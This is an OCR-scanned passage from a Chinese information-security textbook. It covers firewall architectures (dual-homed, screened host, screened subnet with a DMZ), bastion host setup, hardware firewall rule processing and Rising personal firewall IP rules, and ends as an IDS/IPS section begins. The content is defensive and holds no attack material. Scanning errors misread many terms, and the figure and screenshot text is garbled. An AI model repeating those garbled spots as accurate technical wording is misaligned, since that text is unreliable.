求 , 这 个 请 求 必须 用 协商 得 出 的 方法 进行 验证 SOCKS 服务 器 评估 这 个 请 求 决定 是 否 建 
立 到 目标 的 连接 。 
3.4.1.3 ”防火 墙 的 体系 结构 

首先 介绍 防火 墙 体系 结构 中 常见 的 术语 : 堡垒 主机 、 双 重 宿主 主机 和 周边 网 络 。 

@ 堡垒 主机 (BastionHost): 堡垒 主机 是 指 可 能 直接 面 对 外 部 用 户 攻击 的 主机 系统 。 
在 防火 墙 体系 结构 中 ， 特 指 那些 处 于 内 部 网 络 的 边缘 ， 并 且 暴 露 于 外 部 网 络 用 户 面前 的 
主机 系统 。 一 般 来 说 ， 堡 又 主机 上 提供 的 服务 越 少 越 好 ， 因 为 每 增加 一 种 服务 就 增加 了 
被 攻击 的 可 能 性 。 

© 双重 宿主 主机 (Dual-HomedHost): 双重 宿主 主机 是 指 至 少 拥有 两 个 网 络 接口 的 
计算 机 系统 ， 一 个 接口 接 内 部 网 ， 一 个 接口 接 外 部 网 。 一 般 来 说 ， 双 重 宿主 主机 是 实现 
多 个 网 络 之 间 互 连 的 关键 设备 ， 比 如 网 桥 是 在 数据 链 路 层 实现 互 连 的 双重 宿主 主机 ， 路 
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由 器 是 在 网 络 层 实现 互 连 的 双重 宿主 主机 ， 应 用 层 网 关 是 在 应 用 层 实现 互 连 。 

© 周边 网 络 (DMZ): 周边 网 络 是 指 在 内 部 网 络 、 外 部 网 络 之 间 增 加 的 一 个 网 络 。 
一 般 来 说 , 对 外 提供 服务 的 各 种 服务 器 都 可 以 放 在 这 个 网 络 里 。 周边 网 络 也 被 称 为 DMZ 
(DemilitarizedZone， 非 军事 区 )， 其 含义 来 自 于 朝鲜 战争 期 间 ， 在 南北 朝鲜 之 间 的 非 军 
事 地 带 。 周 边 网 络 的 存在 ， 使 得 外 部 用 户 访问 服务 器 时 不 需要 进入 内 部 网 络 ， 而 内 部 网 
络 用 户 对 服务 器 维护 工作 导致 的 信息 传递 也 不 会 泄露 至 外 部 网 络 。 同 时 ， 周 边 网 络 与 外 
部 网 络 之 间 、 与 内 部 网 络 之 间 都 存在 着 数据 包 过 滤 ， 这 样 为 外 部 用 户 的 攻击 设置 了 多 重 
障碍 ， 确 保 了 内 部 网 络 的 安全 。 周 边 网 络 工作 原理 如 图 3-50 所 示 。 
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图 3-50 周边 网 络 示意 图 


下 面 开 始 介绍 防火 墙 的 体系 结构 : 

防火 墙 的 经 典 体系 结构 主要 有 三 种 形式 : 双重 宿主 主机 体系 结构 、 被 屏蔽 主机 体系 
结构 和 被 屏蔽 子 网 体系 结构 。 

1. 双重 宿主 主机 体系 结构 (Dual-HomedHostArchitecture) 

防火 墙 的 双重 宿主 主机 体系 结构 是 指 以 一 台 双 重 宿主 主机 作为 防火 墙 系统 的 主体 ， 
执行 分 离 外 部 网 络 与 内 部 网 络 的 任务 。 

一 个 典型 的 双重 宿主 主机 体系 结构 如 图 3-51 所 示 。 
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图 3-51 双重 宿主 主机 体系 结构 


在 基于 双重 宿主 主机 体系 机 构 的 防火 墙 中 ， 带 有 内 部 网 络 和 外 部 网 络 接口 主机 系统 
就 构成 了 防火 墙 的 主体 。 该 台 双 重 宿主 主 机 具备 了 成 为 内 部 网 络 和 外 部 网 络 之 问 路 由 器 
的 条 件 ， 但 是 在 内 部 网 络 与 外 部 网 络 之 间 进 行 数据 包 转 发 的 进程 是 被 禁止 运行 的 。 

为 了 达到 防火 墙 的 基本 效果 ， 在 双重 宿主 主机 系统 中 ， 任 何 路 由 功能 是 禁止 的 ， 甚 
至 前 面 介绍 的 数据 包 过 滤 技 术 也 是 不 允许 在 双重 宿主 主机 上 实现 的 。 双 重 宿主 主机 唯一 
可 以 采用 的 防火 墙 技术 就 是 应 用 层 代 理 。 内 部 网 络 用 户 可 以 通过 客户 端 代理 软件 以 代理 
方式 访问 外 部 网 络 资源 ， 或 者 直接 登录 至 双重 宿主 主机 成 为 一 个 用 户 ， 再 利用 该 主机 直 
接 访问 外 部 资源 。 

双重 宿主 主机 体系 结构 防火 墙 的 优点 在 于 : 网 络 结构 比较 简单 ; 由 于 内 外 网 络 之 间 
没有 直接 的 数据 交互 而 较为 安全 ， 内 部 用 户 的 存在 可 以 保证 对 外 部 资源 进行 有 效 控制 ; 
最 后 由 于 应 用 层 代理 机 制 的 采用 ， 可 以 方便 地 形成 应 用 层 的 数据 过 滤 。 其 缺点 在 于 : 用 
户 访问 外 部 资源 较为 复杂 ， 如 果 用 户 需要 登录 到 主机 上 才能 访问 外 部 资源 则 主机 的 资源 
消耗 较 大 ; 用 户 机 制 存在 着 安全 隐患 ， 并 且 内 部 用 户 无 法 借助 于 该 体系 结构 访问 新 的 服 
务 或 者 特殊 服务 ， 最 后 一 旦 外 部 用 户 入 侵 了 双重 宿主 主机 ， 则 导致 内 部 网 络 处 于 不 安全 

2. 被 屏蔽 主机 体系 结构 (ScreenedHostArchitecture) 

被 屏蔽 主机 体系 结构 是 指 通过 一 个 单独 的 路 由 器 和 内 部 网 络 上 的 堡垒 主机 共同 构 
成 防火 墙 ， 主 要 通过 数据 包 过 滤 实 现 内 外 网 络 的 隔离 和 对 内 网 的 保护 。 一 个 典型 的 被 屏 
项 主机 体系 结构 如 图 3-52 所 示 。 在 被 屏蔽 主机 体系 结构 中 ， 有 两 道 屏 障 ， 一 是 屏蔽 路 
器 ， 另 外 一 个 是 堡垒 主机 。 

屏蔽 路 由 器 位 于 网 络 的 最 边缘 ， 负 责 与 外 网 实施 连接 ， 并 且 参 与 外 网 的 路 由 。 屏 项 
路 由 器 不 提供 任何 服务 , 仅 提供 路 由 和 数据 包 过 滤 功 能 , 因此 屏蔽 路 由 器 本 身 较 为 安全 ， 
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被 攻击 的 可 能 性 较 小 。 由 于 屏蔽 路 由 器 的 存在 ， 使 得 堡垒 主机 不 再 是 直接 与 外 网 互 连 的 
双重 宿主 主机 ， 增 加 了 系统 的 安全 性 。 

保 垒 主机 存放 在 内 部 网 络 中 ， 是 内 部 网 络 中 唯一 可 以 连接 到 外 部 网 络 的 主机 ， 也 是 
外 部 用 户 访问 内 部 网 络 资源 必须 经 过 的 主机 设备 。 经 典 的 被 屏蔽 主机 体系 结构 中 ， 堡 又 
主机 也 通过 数据 包 过 滤 功 能 实现 对 内 部 网 络 的 防护 ， 并 且 该 堡垒 主机 仅仅 允许 通过 特定 
的 服务 连接 。 主 机 也 可 以 不 提供 数据 包 过 滤 功 能 ， 而 是 提供 代理 功能 。 内 部 用 户 只 能 通 
过 应 用 层 代理 访问 外 部 网 络 ， 而 堡垒 主机 就 成 为 外 部 用 户 唯一 可 以 访问 的 内 部 主机 。 


外 部 网 络 


膝 上 型 计算 机 


| 工人。 工作 站 


图 3-52 ”被 屏蔽 主机 体系 结构 


在 被 屏蔽 主机 体系 结构 中 ， 外 部 用 户 在 被 允许 的 情况 下 可 以 访问 内 部 网 络 ， 一 旦 用 
户 入 侵 保 又 主机 ， 就 会 导致 内 部 网 络 处 于 不 安全 状态 。 此 外 ， 路 由 器 和 堡垒 主机 的 过 滤 
规则 配置 较为 复杂 。 

3. 被 屏蔽 子 网 体系 结构 (ScreenedSubnetArchitecture) 

在 防火 墙 的 双重 宿主 主机 体系 结构 和 被 屏蔽 主机 体系 结构 中 ， 保 又 主机 都 是 最 主要 
的 安全 缺陷 。 一 旦 堡垒 主机 被 入 侵 ， 则 整个 内 部 网 络 都 处 于 入 侵 者 的 威胁 之 中 。 为 解决 
这 种 安全 隐患 ， 被 屏蔽 子 网 体系 结构 被 提出 。 

被 屏蔽 子 网 体系 结构 将 防火 墙 的 概念 扩充 至 一 个 由 两 台 路 由 器 包围 起 来 的 周边 网 
络 ， 并 且 将 容易 受到 攻击 的 堡垒 主机 都 置 于 这 个 周边 网 络 中 。 一 个 典型 的 屏蔽 子 网 体系 
结构 如 图 3-53 所 示 。 

被 屏蔽 子 网 体系 结构 的 防火 墙 比较 复杂 ,主要 由 四 个 部 件 构 成 , 分 别 为 : 周边 网 络 、 
外 部 路 由 器 、 内 部 路 由 器 以 及 堡垒 主机 。 

(1) 周边 网 络 

周边 网 络 是 位 于 非 安全 、 不 可 信 的 外 部 网 络 与 安全 、 可 信 的 内 部 网 络 之 间 的 一 个 附 
加 网 络 。 周 边 网 络 与 外 部 网 络 、 周 边 网 络 与 内 部 网 络 之 问 都 是 通过 屏蔽 路 由 器 实现 逻辑 
隔离 的 ， 因 此 外 部 用 户 必 须 穿 越 两 道 屏 蔽 路 由 器 才能 访问 内 部 网 络 。 
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图 3-53 被 屏蔽 子 网 体系 结构 


(2) 外 部 路 由 器 

外 部 路 由 器 的 主要 作用 在 于 保护 周边 网 络 和 内 部 网 络 ， 是 屏蔽 子 网 体系 结构 的 第 一 
道 屏 障 。 在 其 上 设置 了 对 周边 网 络 和 内 部 网 络 进行 访问 的 过 滤 规 则 ， 该 规则 主要 针对 外 
网 用 户 。 例 如 限制 外 网 用 户 仅 能 访问 周边 网 络 而 不 能 访问 内 部 网 络 ， 或 者 仅 能 访问 内 章 
网 络 中 的 部 分 主机 。 

(3) 内 部 路 由 器 

内 部 路 由 器 用 于 隔离 周边 网 络 和 内 部 网 络 ， 是 屏蔽 子 网 体系 结构 的 第 二 道 屏障 。 在 
其 上 设置 了 针对 内 部 用 户 的 访问 过 滤 规 则 ， 对 内 部 用 户 访问 周边 网 络 和 外 部 网 络 进行 限 
制 。 例 如 部 分 内 部 网 络 用 户 只 能 访问 周边 网 络 而 不 能 访问 外 部 网 络 等 。 

(4) 堡垒 主机 

在 被 屏 项 子 网 结构 中 ， 堡 垒 主机 位 于 周边 网 络 ， 可 以 向 外 部 用 户 提供 WWW, FTP 
等 服务 ， 接 受 来 自 外 部 网 络 用户 的 服务 资源 访问 请 求 。 同 时 堡垒 主机 也 可 以 向 内 部 网 络 
用 户 提供 DNS、 电 子 邮 件 、WWW 代理 、FTP 代理 等 多 种 服务 ， 提 供 内 部 网 络 用 户 访问 
外 部 资源 的 接口 。 

构建 被 屏蔽 子 网 体系 结构 的 成 本 较 高 ， 被 屏蔽 子 网 体系 结构 的 配置 较为 复杂 。 
3.4.1.4 ”防火 墙 配置 和 应 用 

防火 墙 的 安装 和 配置 涉及 外 部 路 由 器 、 内 部 路 由 器 、 堡 垒 主机、 代理 系统 等 的 安装 
和 配置 。 

在 有 外 部 路 由 器 的 防火 墙 中 ， 外 部 路 由 器 的 安装 与 配置 工作 必须 包含 以 下 的 内 容 : 

© 连接 线路 : 保证 设备 与 外 部 网 络 、 周 边 网 络 (或 内 部 网 络 ) 的 线路 连接 正常 。 
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@ 配置 网 络 接口 : 配置 网 络 接口 的 工作 主要 包括 IP 地 址 、 子 网 掩 码 、 开 启 网 络 接 
口 等 ， 在 配置 完毕 后 需要 进行 网 络 接口 连通 性 测试 ， 必 须 保证 路 由 器 上 的 测试 程序 可 以 
通过 外 部 网 络 接口 访问 外 部 网 络 ， 通 过 内 部 网 络 接口 可 以 访问 周边 网 络 〈 或 内 部 网 络 )。 

图 测试 网 络 连通 性 : 在 不 添加 访问 控制 规则 的 情况 下 ， 用 户 应 该 能 够 通过 路 由 器 
从 周边 网 络 访问 外 部 网 络 ， 同 样 从 外 部 网 络 访问 周边 网 络 。 

© 配置 路 由 算法 : 为 让 外 部 路 由 器 能 够 参与 外 部 网 络 的 路 由 运算 ， 必 须 在 外 部 路 
由 器 上 配置 相应 的 动态 路 由 算法 或 静态 路 由 ， 同 时 将 外 部 网 络 访问 内 部 网 络 的 下 一 跳 地 
址 指向 内 部 路 由 器 或 双重 宿主 主机 。 

© 路 由 器 的 访问 控制 : 在 路 由 算法 配置 完毕 后 ， 需 要 配置 针对 路 由 器 自身 的 访问 
控制 ， 限 制 路 由 器 对 外 部 提供 Telnet 等 服务 ， 将 这 些 服务 的 服务 范围 限制 在 内 部 网 络 中 
的 管理 员 使 用 的 计算 机 。 

内 部 路 由 器 与 内 部 网 络 直接 相连 ， 并 不 是 所 有 网 络 的 防火 墙 中 都 出 现 内 部 路 由 器 。 
但 是 内 部 路 由 器 一 旦 出 现 ， 就 是 内 部 网 络 的 最 后 一 道 屏 障 ， 其 安全 问题 必须 得 到 保障 。 
内 部 路 由 器 的 安装 工作 基本 同 外 部 路 由 器 一 样 ， 存 在 区 别 的 地 方 在 于 : 内 部 路 由 器 不 参 
与 外 部 路 由 算法 ， 也 不 参与 内 部 网 络 中 各 子 网 间 的 路 由 转发 ， 因 此 只 需要 通过 静态 路 由 
配置 外 部 网 络 、 内 部 网 络 、 周 边 网 络 之 间 的 数据 包 转 发 。 

堡垒 主机 作为 防火 墙 体系 结构 的 基本 单元 ， 起 着 关键 的 保障 作用 。 安 装 堡垒 主机 应 
该 按照 以 下 的 步骤 进行 。 

O 选择 合适 的 物理 位 置 ; 保 垒 主机 防止 的 物理 位 置 直接 关系 到 主机 的 安全 性 。 为 
防止 入 侵 来 自 于 盗窃 、 物 理 损 伤 等 ， 保 参 主 机 必须 保证 其 物理 安全 性 。 这 就 要 求 保 艰 主 
机 必须 存放 在 安全 措施 完善 的 机 房 内 部 ， 同 时 要 保证 机 房 的 供电 、 通 风 、 恒 温 、 监 控 条 
件 良 好 。 

@ 选择 合适 的 硬件 设备 : 堡垒 主机 要 根据 具体 提供 的 服务 选择 合适 的 硬件 设备 。 
选择 堡垒 主机 一 定 要 以 满足 服务 性 能 需求 作为 最 终 依据 ， 过 高 、 过 低 的 配置 都 是 不 合 由 
宜 的 。 

@ 选择 合适 的 操作 系统 : 堡垒 主机 操作 系统 的 选择 必须 考虑 到 安全 性 、 高 效 性 等 
方面 的 因素 ， 同 时 考虑 基于 该 操作 系统 设计 服务 的 移植 性 。 堡 又 主机 操作 系统 应 该 尽量 
选择 较为 安全 、 稳 定 、 病 毒 攻击 较 少 的 UNIX 系统 。 如 果 选 择 了 Windows 平台 ， 就 必须 
做 到 及 时 安装 补丁 程序 。 同 时 无 论 选 择 何 种 操作 系统 ， 对 系统 的 升级 、 漏 洞 扫描 等 工作 
都 是 必须 的 。 保 证 操作 系统 的 稳定 、 高 效 和 安全 是 保证 煲 垒 主机 提供 优良 服务 的 基础 。 

@ 注意 堡垒 主机 的 网 络 接 入 位 置 : 一 旦 决定 了 防火 墙 的 基本 体系 结构 ， 就 可 以 基 
本 确定 保 垒 主机 在 网 络 中 的 位 置 。 

© 设置 堡垒 主机 提供 的 服务 : 堡垒 主机 上 可 以 提供 的 服务 有 域名 服务 (DNS)、 电 
子 邮 件 服务 (SMTP)、 文 件 传输 服务 (FTP)、 万 维 网 服务 CWWW) 等 。 这 些 服务 属于 
低 风 险 服 务 ， 存 在 一 定 的 安全 隐患 ， 通 过 添加 一 些 安全 措施 可 以 消除 安全 问题 〈 例 如 用 


Ba 


xx 医 


信息 安全 工程 师 教程 


户 卫 限制 等 )。 

一 般 情 况 下 ， 代 理 系统 实施 的 基本 要 求 是 在 网 络 中 只 允许 代理 服务 器 能 够 访问 外 部 
网 络 的 某 种 服务 ， 客 户 机 只 能 够 通过 代理 服务 器 获取 相应 的 资源 。 一 旦 防火 墙 不 限制 客 
户 机 直接 通过 P 访问 外 部 资源 ,客户 就 可 以 绕 过 代理 系统 直接 访问 外 部 服务 器 ， 则 代理 
系统 就 失去 了 存在 的 意义 。 由 于 代理 软件 将 安装 在 保全 主机 或 双重 宿主 主机 上 ， 因 此 选 
择 代理 服务 器 软件 时 ， 尽 量 选择 较为 成 熟 、 稳 定 的 产品 或 版 本 ， 不 要 随意 使 用 非 正规 途 
径 获得 的 服务 器 软件 。 代 理 服务 器 应 该 禁用 远程 配置 。 

在 防火 墙 构建 完毕 后 ， 需 要 对 防火 墙 的 运行 效果 检查 ， 检 查 的 内 容 包括 : 对 外 提供 
的 服务 、 对 内 提供 的 服务 、 网 络 访问 。 

对 外 提供 的 服务 主要 包括 WWW, FTP, BBS, EMAIL 等 ， 需 要 通过 外 部 网 络 用 户 
访问 这 些 服务 资源 进行 服务 效果 检查 。 

对 内 提供 的 服务 包括 DNS 等 ， 内 部 网 络 用 户 需 要 检查 在 防火 墙 构建 之 后 ， 是 否 能 


够 流畅 地 使 用 这 些 服务 资源 。 
网 络 访问 是 对 数据 包 过 滤 规 则 的 测试 ， 检 查 过 滤 规 则 是 否 生效 ， 并 及 早 发 现 规则 中 
存在 的 漏洞 。 


下 面 分 别 介绍 以 硬件 防火 墙 和 软件 防火 墙 为 例 ， 介 绍 它们 相关 的 概念 与 应 用 。 
(1) 硬件 防火 墙 
硬件 防火 墙 采 用 了 较 安 全 操作 系统 ， 具 有 3 至 10 个 网 络 接口 。 标 准 配置 为 3 个 网 
络 接 口 ， 可 用 于 控制 进 /出 内 部 网 和 外 部 网 及 访问 行为 、 检 测 攻击 行为 、 对 常用 攻击 行为 
做 出 反应 ， 并 对 通信 进行 审计 等 。 
硬件 防火 墙 的 安全 机 制 有 : 
。 多 端口 结构 ; 
。 透明 连接 方式 ; 
多 级 过 滤 技 术 ; 
网 络 地 址 转换 (NAT) 技术 ; 
。 安全 服务 器 网 络 SSN; 
。 用 户 鉴别 ; 
a 透明 代理 ; 
o IP 和 MAC 地 址 绑 定 ; 
。 安全 套 接 层 SSL; 
。 日 志 与 审计 ; 
。 流量 管理 ; 
© 双 机 热 备 ; 
。 支持 与 IDS 联动 ; 
。 SSH 远程 管理 ; 
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。 支 持 SNMP. 

硬件 防火 墙 的 规则 内 容 包括 : 源 对 象 、 目 的 对 象 、 源 端口 、 目 的 端口 、 协 议和 时 间 。 
所 有 的 规则 组 成 访问 控制 表 ， 过 滤器 对 访问 控制 表 采 用 顺序 检查 方式 。 

规则 的 动作 可 分 为 三 种 方式 :“ 人 允许 ”表示 准许 该 他 包 通 过 防火 墙 ;“ 拒 绝 ”表示 返 
回 目 的 地 址 不 可 达 信息 给 连接 发 起 端 ， 并 禁止 IP 包 通 过 防火 墙 ;“ 阻 塞 ” 仅 仅 是 禁止 连 
接 的 建立 ， 并 不 返回 任何 信息 给 连接 发 起 端 。 

过 滤器 找到 匹配 规则 后 ， 对 于 后 续 规则 不 再 作 检 查 。 检 查 完 所 有 规则 后 ， 如 果 没 有 
过 滤 规 则 符合 , 可 以 按照 缺 省 方式 处 理 。 在 进行 规则 设置 时 要 充分 考虑 到 规则 作用 顺序 。 

当 收 到 一 个 数据 包 时 ， 防 火 墙 按 如 下 顺序 进行 处 理 : 

O 数据 包 是 ARP/RARP， 如 果 设 置 了 透明 ， 则 在 设置 透明 的 网 卡 之 间 转 发 ， 否 则 
ER: 

@ 此 数据 包 若 为 卫 包 ， 匹 配 卫 和 MAC 地 址 绑 定 规则 ， 通 过 则 继续 后 继 规 则 ; 

@ 此 数据 包 是 他 广播 包 或 多 播 包 ， 如 果 设 置 了 透明 ， 且 IP 广播 包 和 多 播 包 人 允许 ， 
则 在 设置 透明 的 网 卡 之 间 转 发 此 IP 包 ， 否 则 丢弃 ; 

© 如 果 是 普通 他 包 : 

o 如 果 此 IP 包 对 应 免 认 证 下 范围 ， 则 匹配 后 续 规则 ， 和 否则 检查 用 户 ; 

。 如 果 不 是 合法 用 户 或 用 户 没 有 通过 认证 ， 则 丢弃 ;如 果 为 合法 用 户 且 通过 认证 ， 
则 查找 对 应 包 过 滤 规 则 ; 
如 果 找 到 规则 且 被 该 规则 禁止 ， 则 丢弃 ， 
如 果 没 找到 或 不 被 包 过 滤 规 则 禁止 ， 则 匹配 访问 规则 ; 

。 如 果 方 式 为 NAT 或 反 向 NAT， 则 查找 对 应 NAT 规则 ， 如 果 找 到 则 进行 地 址 、 端 

口 转换 并 匹配 后 继 规则 ; 

。 如 果 方 式 为 PROXY， 则 查找 对 应 代理 规则 ， 若 允许 则 匹配 后 继 规则 ; 

。 如 果 方 式 为 NONE， 则 查找 流量 统计 与 控制 规则 ， 如 果 人 允许， 则 转发 ， 否 则 丢弃 。 

防火 墙 的 所 有 规则 和 政策 都 被 视 为 对 象 对 象 名 均 不 超过 25 个 字符 )， 以 面向 对 象 
的 方式 进行 管理 。 每 一 个 对 象 包 含有 一 条 或 若干 条 相同 控制 条 件 ， 对 象 的 概念 简化 了 用 
户 规则 的 复杂 性 ， 并 且 ， 同 一 对 象 可 以 多 次 引用 。 对 象 包括 IP 对 象 、 用 户 对 象 、 用 户 组 
对 象 、 时 间 对 象 、OUT/IN 服务 对 象 、HTTP、FTP、SMTP、POP3、NNTP 代理 对 象 和 
ICMP 对 象 等 。 可 以 添加 、 删 除 对 象 ， 也 可 以 对 对 象 进行 编辑 。 

。 IP 对 象 

IP 对 象 是 指 网 络 中 的 IP 地址 的 集合 CP 对 象 名 不 超过 25 个 字符 )， 可 以 是 局 域 网 
内 部 的 地 址 ， 也 可 以 是 整个 Intemet 上 其 他 计算 机 的 IP 地 址 。 将 其 定义 为 P 对 象 以 后 ， 
就 可 以 在 以 后 的 规则 设 定 中 将 这 些 对 象 作为 源 地址 集 或 目的 地 址 集 加 以 引用 。 

。 用 户 对 象 


Bo 项 


200) 
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一 个 用 户 对 象 反映 一 个 用 户 的 以 下 情况 : FA IP 地 址 、 掩 码 ， 以 及 该 用 户 的 状 
A Hp: 用 户 名 是 指 某 个 用 户 的 标识 符 〈 不 超过 8 个 字符 )，JP 地 址 的 是 指 该 用 户 只 
在 指定 的 IP 范围 进行 认证 ; 掩 码 则 是 指 该 P 范围 的 子 网 掩 码 ; 状态 是 指 该 用 户 在 该 
IP 上 有 效 或 无 效 管理 员 可 以 通过 WWW 管理 界面 添加 用 户 ， 在 Web 界面 添加 用 户 时 ， 
为 了 避免 管理 员 和 防火 墙 之 间 数 据 通信 被 监听 ， 可 以 启动 SSL 服务 。 

。 时 间 对 象 

时 间 对 象 定义 的 是 时 间 区 间 。 时 间 对 象 在 规则 中 被 引用 ， 用 于 限定 规则 适用 的 时 间 
区 间 。 

。 服务 对 象 

一 个 服务 对 象 包含 若干 服务 规则 ， 每 一 条 包括 方式 (Proxy, NAT, None), RHK 
协议 CTCP、UDP)、 服 务 (HTTP、FTP、SMTP、POP3、NNTP)、 源 端口 、 目 的 端 
和 代理 服务 对 象 名 。 

© HTTP 代理 对 象 

HTTP 对 象 定义 的 是 用 户 通过 防火 墙 进行 HTTP 访问 ( 即 WWW 浏览 ) 时 的 各 种 限 
制 设 定 。 一 个 HTTP 对 象 包含 若干 条 访问 设 定 。 而 每 一 条 设 定 的 内 容 则 包括 方法 
(method), i (scheme)、 主 机 名 、 端 口号 、 绝 对 路 径 、 动 作 、 过 滤 、 日 志和 注释 。 

。 FIP 代理 对 象 

FTP 对 象 定义 了 用 户 通过 防火 墙 进行 FTP 访问 ( 即 文件 下 载 上 传 ) 时 的 各 种 限制 设 
定 。 每 个 FIP 对 象 包含 若 干 条 访问 设 定 ， 而 每 一 条 设 定 的 内 容 包括 方法 (method)、 路 
径 、 动 作 、 日 志和 注释 : 

。 ICMP 对 象 

ICMP 对 象 定义 了 用 户 通过 防火 墙 发 送 ICMP 报 文 时 的 设 定 ， 包 括 : Echo 允许 、 源 
抑制 允许 、 超 时 、 时 间 戳 允许 、 源 地 址 不 可 达 等 。 

完成 了 前 面 各 类 对 象 的 定义 以 后 ， 就 可 以 设 定 访问 规则 ， 这 是 防火 墙 实现 包 过 滤 功 
能 所 依据 的 安全 政策 。 所 有 的 规则 组 成 访问 控制 表 ， 过 滤器 对 访问 控制 表 采 取 顺 序 检查 
方式 ， 对 每 一 条 连接 都 在 访问 控制 表 中 按 序 查 找 匹配 ， 如 果 与 某 一 条 规则 匹配 (匹配 指 
的 是 当前 连接 的 每 一 个 域 均 包含 于 这 条 规则 的 过 滤 域 , 否则 认为 不 匹配 ), 则 根据 这 条 规 
则 指定 的 动作 处 理 ， 对 后 序 规则 不 再 作 检查 。 检 查 完 所 有 规则 后 ， 如 果 不 与 任 一 条 规则 
匹配 ， 则 遵循 默认 拒绝 的 策略 将 之 拒绝 。 

(2) 软件 防火 墙 

下 面 以 Windows 下 常用 的 瑞星 个 人 防火 墙 为 例 ， 说 明 软 件 防火 墙 的 使 用 和 配置 。 

打开 防火 墙 主 程序 ， 在 菜单 中 依次 选择 “设置 "“ 详 细 设 置 ”， 在 弹出 的 “详细 设 
置 ” 对 话 框 中 进行 系统 设置 。 其 中 规则 设置 包括 : 黑 名 单 、 白 名 单 、 端 口 开关 、 可 信 区 、 
卫 规则 和 模块 规则 。 如 图 3-54 所 示 。 
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EEPOSE: 
黑 名单 :在 此 区 域 中 的 计算 机 本目 与 本 机 通讯 
自 名 单 : 完全 信任 的 计算 机 可 加 入 此 区 域 ， 
端口 开关 可 以 手工 控制 端口 是 否 可 以 通讯 
TEE: 。 指定 局 城 网 计算 机 的 ， 默 认 对 方 计算 机 不 在 此 区 域 。 
PAR: EPENEMAN. 

RR | BAA SRNR 
| Fe Ree 
| -D 白 名 单 
日 记 ARP 欺 驴 防 御 

fe) ARPAS 


图 3-54 ”瑞星 个 人 防火 墙 的 规则 设置 


以 下 仅 就 TP 规则 的 设置 进行 简单 说 明 : 

IP 规则 是 用 来 设置 IP 层 的 过 滤 规 则 。 卫 规则 列表 如 图 3-55 所 示 。 列 表 中 显示 当前 
使 用 的 下 规则 ， 具 体 列 出 规则 名 称 、 状 态 、 协 议 、 对 方 端口 、 本 地 端口 以 及 是 否 报警。 
打 勾 的 项 表示 生效 。 鼠标 双击 每 条 IP 规则 都 可 以 进行 详细 设置 , 图 3-56 即 为 瑞星 的 “ 编 
辑 也 规则 ”也 可 以 通过 “导入 规则 ”来 添加 下 规则 。 


规则 名 称 状态 。 协议 对 方 端口 本 地 端口 Hic 


A 允许 域名 解析 V UDP 53, 任意 端口 不 报 
人 允许 动态 IP oY UDP 67-8, 67-68, 不 报 
允许 SNMP V UP EERO 161, AAR 
加 允许 YPN 协议 V GRE 不 报 
四 允许 YPNAH) 协 议 AH 不 报 
人 允许 IKE VPN W uP 500, 500, 不 报 
允许 PPTP VPN V TP 1024-65535, 1723, 不 报 
C 允许 LzTP YPN V Tc 1024-65535, 1701, 不 报 
允许 FTP 数 据 V 20, 任意 端口 不 报 
允许 BT 下 载 VY TP 任意 端口 6681-6890, 不 报 
Mi 允许 Ping 出 V io 2 个 类 型 的 组 合 类 型 代码 为 ,， 不 报 
四 禁止 Ping 入 % ICMP 1 个 类 型 的 组 合 类 型 代码 为 ,,。 报警 
允许 目的 不 可 达 V io 类 型 代码 为 : 3 代码 任意 不 报 4 
放行 所 有 ICMP V imp 任意 类 型 代码 任意 ABD 
qd ] D 


规则 越 多 性 能 越 低 ; 不 需要 增加 与 应 用 相关 的 规则 ,系统 在 应 用 需要 时 打开 端口 ; 
也 不 需要 增加 防范 性 规则 ,系统 已 经 内 置 并 且 自 动 升级 。 


me 增加 插入 删除 导入 导出 


图 3-55 瑞星 个 人 防火 墙 的 IP 规则 列表 


编辑 IP 规则 和 添加 卫 规则 的 过 程 类 似 ， 分 为 以 下 四 步 : 输入 规则 名 称 ， 并 选择 规 
则 匹配 成 功 后 执行 的 动作 ;填写 本 地 地 址 与 对 方 地 址 ， 进行 协议 设置 ; 选择 匹配 成 功 后 
的 报警 方式 。 其 中 协议 设置 中 有 : ALL、TCP、UDP、TCPORUDP、ICMP、IGMP、ESP、 
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AH, GRE, RDP, SKIP 共 11 种 。 选 择 不 同 的 协议 类 型 会 出 现 不 同 的 设置 选项 ， 在 此 不 
详细 介绍 。 

需要 注意 的 是 ， 规 则 越 多 性 能 越 低 ， 不 需要 增加 与 应 用 相关 的 规则 ， 系 统 在 应 用 需 
要 时 打开 端口 ， 也 不 需要 增加 防范 性 规则 ， 系 统 已 经 内 置 并 且 自 动 升级 。 


请 输入 规则 名 称 : 
[EPA 


规则 匹配 成 功 后 的 动作 : 

ORT: 允许 数据 包 通 过 。 

@ 禁止 : 禁止 数据 包 通 过 。 

OZR: 忽略 数据 包 ， 但 可 以 写 入 日 志 进 行 监控 。 


图 3-56 ”瑞星 个 人 防火 墙 的 编辑 他 规则 界面 
另外 ， 对 Linux 的 Netfilter， 会 熟练 使 用 IPtables 配置 常见 的 安全 规则 。 
3.4.2 和信 侵 检测 与 防护 


入 侵 检测 与 防护 的 技术 主要 有 两 种 : 入 侵 检 测 系 统 (IntrusionDetectionSystem, IDS) 
和 入 侵 防 护 系统 (IntrusionPreventionSystem，IPS )。 

入 侵 检测 技术 ADS) 注重 的 是 网 络 安全 状况 的 监管 ， 通 过 监视 网 络 或 系统 资源 ， 
寻找 违反 安全 策略 的 行为 或 攻击 迹象 , 并 发 出 报警 。 因此 绝 大 多 数 IDS 系统 都 是 被 动 的 。 

入 侵 防 护 系 统 APS) 则 倾向 于 提供 主动 防护 ,注重 对 入 侵 行 为 的 控制 。 其 设计 宗旨 
是 预先 对 入 侵 活动 和 攻击 性 网 络 流量 进行 拦截 ， 避 免 其 造成 损失 。IPS AKA 
到 网 络 流量 中 实现 这 一 功能 的 ， 即 通过 一 个 网 络 端口 接收 来 自 外 部 系统 的 流量 ， 经 过 检 
查 确 认 其 中 不 包含 异常 活动 或 可 疑 内 容 后 ,再 通过 另外 一 个 端口 将 它 传送 到 内 部 系统 中 。 
这 样 一 来 ， 有 问题 的 数据 包 ， 以 及 所 有 来 自 同 一 数据 流 的 后 续 数据 包 ， 都 能 在 IPS 设备 
中 被 清除 掉 。 

IDS 和 IPS 各 有 侧重 点 ， 不 能 简单 说 哪 种 技术 更 优 。 下 面 本 节 主 要 着 重 介绍 入 侵 检 
测 技 术 (IDS)。 
3.4.2.1 ”入侵 检测 概述 

Adenrson 在 80 年 代 早 期 使 用 了 “威胁 ”这 一 概念 术语 ， 其 定义 与 入 侵 含义 相同 。 
将 入 侵 企图 或 威胁 定义 为 未 经 授权 蓄意 尝试 访问 信息 、 窜 改 信息 ， 使 系统 不 可 靠 或 不 能 
